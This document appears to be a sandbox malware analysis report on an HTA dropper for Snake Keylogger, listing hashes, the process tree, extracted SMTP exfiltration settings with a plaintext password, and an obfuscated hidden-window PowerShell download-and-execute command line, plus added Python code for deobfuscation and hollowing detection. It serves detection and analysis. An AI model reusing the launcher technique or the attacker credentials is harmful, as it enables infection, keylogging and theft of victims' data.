Analysis
- max time kernel: 117s
- max time network: 127s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 07-10-2024 01:54
Static task: static1
Behavioral task: behavioral1
- Sample: bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
- Resource: win10v2004-20240802-en
General
- Target: bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
- Size: 150KB
- MD5: 25a0a6e379daa9cb5c68307fbf0857ea
- SHA1: 4c672a33a46b32584f00868c4b98d10187a91c3c
- SHA256: bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef
- SHA512: fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7
- SSDEEP: 48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT
Malware Config
Extracted: snakekeylogger
- Protocol: smtp
- Host: mail.purityontap.com
- Port: 587
- Username: [email protected]
- Password: mail55
- Email To: [email protected]
The exfiltration channel is SMTP submission (port 587) to mail.purityontap.com, authenticated with credentials embedded in the sample; the mail host, the sender account and the recipient mailbox are each usable as indicators on their own.
Signatures
- Snake Keylogger
  Keylogger and infostealer first seen in November 2020.
- Snake Keylogger payload (3 IoCs)
  resource / yara_rule:
  behavioral1/memory/2636-29-0x0000000000400000-0x0000000000426000-memory.dmp  family_snakekeylogger
  behavioral1/memory/2636-31-0x0000000000400000-0x0000000000426000-memory.dmp  family_snakekeylogger
  behavioral1/memory/2636-30-0x0000000000400000-0x0000000000426000-memory.dmp  family_snakekeylogger
- Blocklisted process makes network request (1 IoCs)
  flow: 4  pid: 2472  Process: powershell.exe
- Downloads MZ/PE file
- Evasion via Device Credential Deployment (1 IoCs)
  pid: 2472  Process: powershell.exe
- Executes dropped EXE (1 IoCs)
  pid: 2844  Process: taskhostw.exe
- Loads dropped DLL (1 IoCs)
  pid: 2472  Process: powershell.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  description / ioc / Process:
  Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegSvcs.exe
  Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegSvcs.exe
  Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegSvcs.exe
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow: 5  ioc: checkip.dyndns.org
- AutoIT Executable (1 IoCs)
  AutoIT scripts compiled to PE executables.
  resource: behavioral1/files/0x00090000000173aa-22.dat  yara_rule: autoit_exe
- Suspicious use of SetThreadContext (1 IoCs)
  description: PID 2844 set thread context of 2636  pid: 2844  Process: taskhostw.exe  procid_target: 38
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 7 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description / ioc / Process:
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskhostw.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  RegSvcs.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
- Modifies Internet Explorer settings (1 IoCs)
  description / ioc / Process:
  Key created  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid / Process:
  2472  powershell.exe
  2472  powershell.exe
  2472  powershell.exe
  2636  RegSvcs.exe
  2636  RegSvcs.exe
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid: 2844  Process: taskhostw.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege  pid: 2472  Process: powershell.exe
  Token: SeDebugPrivilege  pid: 2636  Process: RegSvcs.exe
- Suspicious use of WriteProcessMemory (28 IoCs)
  description / pid / Process / procid_target (identical rows collapsed, count in parentheses):
  PID 2272 wrote to memory of 2940  2272  mshta.exe  30  (x4)
  PID 2940 wrote to memory of 2472  2940  cmd.exe  32  (x4)
  PID 2472 wrote to memory of 2504  2472  powershell.exe  33  (x4)
  PID 2504 wrote to memory of 2676  2504  csc.exe  34  (x4)
  PID 2472 wrote to memory of 2844  2472  powershell.exe  37  (x4)
  PID 2844 wrote to memory of 2636  2844  taskhostw.exe  38  (x8)
- outlook_office_path (1 IoCs)
  Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegSvcs.exe
- outlook_win_path (1 IoCs)
  Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegSvcs.exe
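The WriteProcessMemory and SetThreadContext rows above, read together with the image path and command line of each process in the Processes section, are what separates the last hop (taskhostw.exe into RegSvcs.exe) from the ordinary parent-to-child writes earlier in the chain: the parent writes into the child, resets its thread context, and the child's loaded image is a .NET utility while its command line is taskhostw.exe's. The following is an added example, not part of the report or of any sandbox's code. It encodes the report's process table and the distinct memory-write and thread-context edges as constructed Python data (the long powershell argument is abbreviated to "..." in it) and derives the mshta to cmd to powershell launch chain and the hollowing candidate from them.

```python
import re

# Process table reconstructed from this report's Processes section:
# pid -> (parent pid, image path, command line).  Parent pids follow the tree
# nesting.  Command lines are as the report shows them, except that the long
# powershell argument is abbreviated to "..." here.
PROCS = {
    2272: (None, r"C:\Windows\SysWOW64\mshta.exe",
           r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta"'),
    2940: (2272, r"C:\Windows\SysWOW64\cmd.exe",
           r'"C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C ..."'),
    2472: (2940, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
           r"pOweRShELl -eX ByPass -nOp -W 1 -C ..."),
    2504: (2472, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
           r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline"'),
    2676: (2504, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
           r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp"'),
    2844: (2472, r"C:\Users\Admin\AppData\Roaming\taskhostw.exe",
           r'"C:\Users\Admin\AppData\Roaming\taskhostw.exe"'),
    2636: (2844, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
           r'"C:\Users\Admin\AppData\Roaming\taskhostw.exe"'),
}

# The description column of the report's WriteProcessMemory and SetThreadContext
# rows, one distinct edge per line (the report repeats each write several times).
EVENT_LINES = """\
PID 2272 wrote to memory of 2940
PID 2940 wrote to memory of 2472
PID 2472 wrote to memory of 2504
PID 2504 wrote to memory of 2676
PID 2472 wrote to memory of 2844
PID 2844 wrote to memory of 2636
PID 2844 set thread context of 2636
"""

_EVENT = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+)")


def parse_events(text):
    """(source pid, operation, target pid) triples from the description text."""
    return [(int(s), op, int(d)) for s, op, d in _EVENT.findall(text)]


def _stem(path):
    """Lower-cased file name without a trailing .exe, so that a bare
    'pOweRShELl' on a command line still matches the powershell.exe image."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def cmdline_image(cmdline):
    """Executable named by a Windows command line: the first token, honouring a
    leading double-quoted path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        tok = s[1:end] if end != -1 else s[1:]
    else:
        tok = s.split(None, 1)[0] if s else ""
    return _stem(tok)


def image_cmdline_mismatch(procs):
    """Pids whose loaded image is not the executable their command line names."""
    return sorted(pid for pid, (_, image, cmd) in procs.items()
                  if _stem(image) != cmdline_image(cmd))


def hollowing_candidates(events, procs):
    """Parent wrote into the child, reset the child's thread context, and the
    child's image disagrees with its command line.  All three together are the
    hollowing pattern; any one alone is common in benign code."""
    wrote = {(s, d) for s, op, d in events if op == "wrote to memory of"}
    ctx = {(s, d) for s, op, d in events if op == "set thread context of"}
    mismatched = set(image_cmdline_mismatch(procs))
    return sorted((s, d) for s, d in wrote & ctx if d in mismatched)


def chain(procs, pid):
    """Image stems from the root of the tree down to pid."""
    out = []
    while pid is not None:
        parent, image, _ = procs[pid]
        out.append(_stem(image))
        pid = parent
    return out[::-1]


def lolbin_chain_hits(procs, pattern=("mshta", "cmd", "powershell")):
    """Pids whose ancestry ends with the given run of living-off-the-land binaries."""
    n = len(pattern)
    return sorted(pid for pid in procs if tuple(chain(procs, pid)[-n:]) == tuple(pattern))


if __name__ == "__main__":
    events = parse_events(EVENT_LINES)
    print("launch chain hits:", lolbin_chain_hits(PROCS))
    print("image/cmdline mismatch:", image_cmdline_mismatch(PROCS))
    print("hollowing candidates:", hollowing_candidates(events, PROCS))
    print("ancestry of 2636:", " > ".join(chain(PROCS, 2636)))
```

The image-versus-command-line comparison is done on file stems rather than full paths on purpose: cmd.exe is recorded under SysWOW64 but launched by its system32 path, and powershell is launched by bare name, and neither of those is the hollowing signal. Requiring the memory write, the thread-context reset and the mismatch together keeps csc.exe and cvtres.exe, which also receive writes from their parents, out of the result.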
Processes
C:\Windows\SysWOW64\mshta.exe (PID 2272)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 2940)
    Command line: "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'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'+[CHAR]0x22+'))')))"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2472)
      Command line: pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'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'+[CHAR]0x22+'))')))"
      - Blocklisted process makes network request
      - Evasion via Device Credential Deployment
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 2504)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 2676)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp"
          - System Location Discovery: System Language Discovery
      C:\Users\Admin\AppData\Roaming\taskhostw.exe (PID 2844)
        Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 2636)
          Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          Note: the loaded image is the .NET RegSvcs.exe utility while the command line is taskhostw.exe's; together with the SetThreadContext and MapViewOfSection signatures on PID 2844 this marks PID 2636 as the hollowed host, which is also where the three Snake Keylogger memory dumps at 0x400000-0x426000 were taken.
          - Accesses Microsoft Outlook profiles
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - outlook_office_path
          - outlook_win_path
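The cmd.exe and powershell.exe command lines above assemble the real command from single-quoted fragments joined with `[char]` casts, so that neither `::` nor the double quotes around the base64 blob appear literally, and the launcher switches are abbreviated and mixed-case. The following is an added example, not part of the report or of the malware: a small Python deobfuscator that rebuilds the inner `Iex()` argument, extracts and decodes the `FromBase64String` operand, and normalises the launcher switches. The sample command line is constructed to match the report's shape, with a constructed base64 payload standing in for the one this page elides; the leading `dEviCECreDENTIalDEpLoyMeNt ;` token is kept because it is the cmdlet name the report's "Evasion via Device Credential Deployment" signature refers to.

```python
import base64
import re

# Constructed sample (not the report's own command line): the same launcher
# switches and string-building shape as the powershell.exe entry in the
# process tree, with a constructed base64 payload where this page elides it.
NEXT_STAGE = "Write-Host 'constructed second stage'"
SAMPLE_CMDLINE = (
    "pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; "
    "ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58"
    "+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a"
    "+'FRoMBaSe64sTRINg('+[Char]34+'"
    + base64.b64encode(NEXT_STAGE.encode("utf-8")).decode("ascii")
    + "'+[CHAR]0x22+'))')))"
)

# One operand of the '+' chain: a single-quoted literal or a [char]N / [char]0xNN
# cast.  PowerShell type names and the 0x prefix are case-insensitive.
_OPERAND = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def _char_value(text):
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def join_concat(expr):
    """Evaluate the literal/[char] concatenation in source order.  Everything
    between operands ('+', parentheses, whitespace) contributes no characters."""
    parts = []
    for m in _OPERAND.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1))
        else:
            parts.append(chr(_char_value(m.group(2))))
    return "".join(parts)


_B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)


def decode_next_stage(cmdline):
    """Rebuild the inner Iex() argument, pull out the FromBase64String("...")
    operand and decode it the way the script does (UTF-8 via GetString)."""
    rebuilt = join_concat(cmdline)
    m = _B64_CALL.search(rebuilt)
    if m is None:
        raise ValueError('no FromBase64String("...") call after deobfuscation')
    return base64.b64decode(m.group(1)).decode("utf-8")


def launcher_flags(cmdline):
    """Normalise abbreviated powershell.exe switches.  Any unambiguous prefix of
    a parameter name is accepted, so -eX is -ExecutionPolicy, -nOp is
    -NoProfile and -W is -WindowStyle; the value 1 is ProcessWindowStyle.Hidden."""
    low = cmdline.lower()
    head = re.search(r"-c(?:o\w*)?\s+([^;]+);", cmdline, re.IGNORECASE)
    return {
        "execution_policy_bypass": re.search(r"-(?:ex\w*|ep)\s+bypass", low) is not None,
        "no_profile": re.search(r"-nop\w*\b", low) is not None,
        "window_hidden": re.search(r"-w(?:i\w*)?\s+(?:1|hidden)\b", low) is not None,
        # First statement of -Command; here the cmdlet name that the report's
        # "Evasion via Device Credential Deployment" signature refers to.
        "leading_statement": head.group(1).strip() if head else "",
    }


if __name__ == "__main__":
    print(join_concat(SAMPLE_CMDLINE))
    print(decode_next_stage(SAMPLE_CMDLINE))
    print(launcher_flags(SAMPLE_CMDLINE))
```

Run against the real command line, the same three functions yield the second stage that powershell.exe executed; on this page the blob is elided, so the constructed payload stands in. The rebuilt string is left in its original mixed case on purpose: matching on `FromBase64String` and the switch names case-insensitively is what makes the normalisation robust to the casing games, and the rebuilt text is what a `::` or `FromBase64String` content rule should be run over, not the raw command line.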
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: b6ebb62625fd54d906c7d0787fa0e0ae
  SHA1: 317d51f4b05b0ae8a5ba21d9c323167bf83e8cf1
  SHA256: ac91467226bfcc7ec199f4509b9bad99f02f05d46d839b990d84a8ede3d44060
  SHA512: 4f3060b3b27ab9cd43bd4377892e0d4fcf1cc0fb2804519ab76790b563014038e6451ae09af3795276e987790cc054aead8d11a5a82b71c2910f8f80b1c4a947
- Filesize: 3KB
  MD5: 4309a3ed19f70034ccf41f7ea7f6e35c
  SHA1: b34ebe8ef85436cf21e3d77b1e673ed9d9c2a118
  SHA256: e28f8fc744a9c323b659a4b433a4e51622375795a7ad90235e4e954d8c0ef80d
  SHA512: 49da216fcc424ac327737e7ffbb578c005d7f91be04f3a7ed6d29c3d0282335c21eeb7e8995b68859b21b077099e9e530f3707f6e3e056b43ed7ff274df0f479
- Filesize: 7KB
  MD5: 034606a291399b39dac22939615faa33
  SHA1: 77b7f601b948b5b92cea5c739068b79d0bab5e4f
  SHA256: 4fc9cfa3d949b5e03737cfbad4a72db283f29cf7027426d4fb406c7e77afc775
  SHA512: fe5f4a3fe3a3d0967340acb222fd3a159ec5d1469313b8fd7ab1177b14ad72f204c16992fc81225d04f4d092b2fff58c9a06a67bf0d228664affe045f4200fb7
- Filesize: 652B
  MD5: 6502f1e6421fba6da9bc1f2cb505750f
  SHA1: aa3695363fae491f66b17474abb65dd2f30dc6f7
  SHA256: a1569e2acc0791066089c9b0a28f1f67c5e893fbb9cddf5c2319d208b0d93094
  SHA512: 0d6ed21bcf96343d1e722267a297e3e050fb563c61511b63a0c76a75caa61bdcb0da79d23d19db4bf3b39176078d86e97d599e30d3f3cf5da99526900782d532
- Filesize: 477B
  MD5: 3c2b912e8118e7163d3d05a557f13d2f
  SHA1: 8889f87c11a2fca2b363c3064d317447a29c5498
  SHA256: 822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852
  SHA512: 7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499
- Filesize: 309B
  MD5: 243a99ee64772f6fcb34f92dbca5c43a
  SHA1: 6945fbceb92c05b80be6a8623ece41cc76d3b7be
  SHA256: b00823537cc8ae7af8903d172aca140a8ba5476bf031650c0af4c6242fc84839
  SHA512: 95f3409c5a7fd5ff3c060a391ddda30dcd3dbe7aaafa28a4d7f0f3dbc2ee6e375f251a190c14bc313ad2047910f03cb2e5799ecc79cb6186381e1a0d8f911f39
- Filesize: 931KB
  MD5: 58ff14d476f2bbaab31b12587c09559e
  SHA1: ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94
  SHA256: 1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364
  SHA512: a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a